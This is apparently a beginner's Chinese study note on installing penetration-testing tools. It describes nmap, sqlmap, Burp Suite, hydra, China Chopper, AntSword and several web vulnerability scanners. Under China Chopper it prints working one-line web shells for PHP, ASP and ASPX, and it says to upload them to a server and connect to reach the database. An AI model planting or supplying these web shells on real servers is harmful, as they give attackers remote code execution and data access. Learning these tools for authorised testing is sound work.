drops第一天 工具安装

今天新接触了许多软件，还有功能强大的虚拟机。
虚拟机安装了全新的Linux系统
1.nmap
nmap可以实现：主机发现，端口扫描，版本侦测，操作系统侦测等功能

2.sqlmap
用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。

3.Burpsuite
用于攻击web应用程序的集成平台，包含了许多工具
打开火狐浏览器的FoxyProxy插件，Burpsuite上打开intercept is on进行抓包

4.hydra
功能强大的暴力**工具
kali虚拟机上自带

5.中国菜刀
一句话木马，短短一行代码，就能实现和大马相当的功能
PHP:
<?php @eval($_POST['pass']);?>
ASP:
<%eval request(“pass”)%>
ASPX:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
上传至服务器，用中国蚁剑或中国菜刀来获取数据库
6.中国蚁剑
与中国菜刀类似，功能更强大。连接后可以拥有类似CMD的高级权限
7.御剑
好用的网站网站后台扫描工具

8.Nessus
漏洞扫描程序


9.AWVS
自动化的web应用程序安全测试工具

10.Appscan
一款好用且功能强大的Web安全测试工具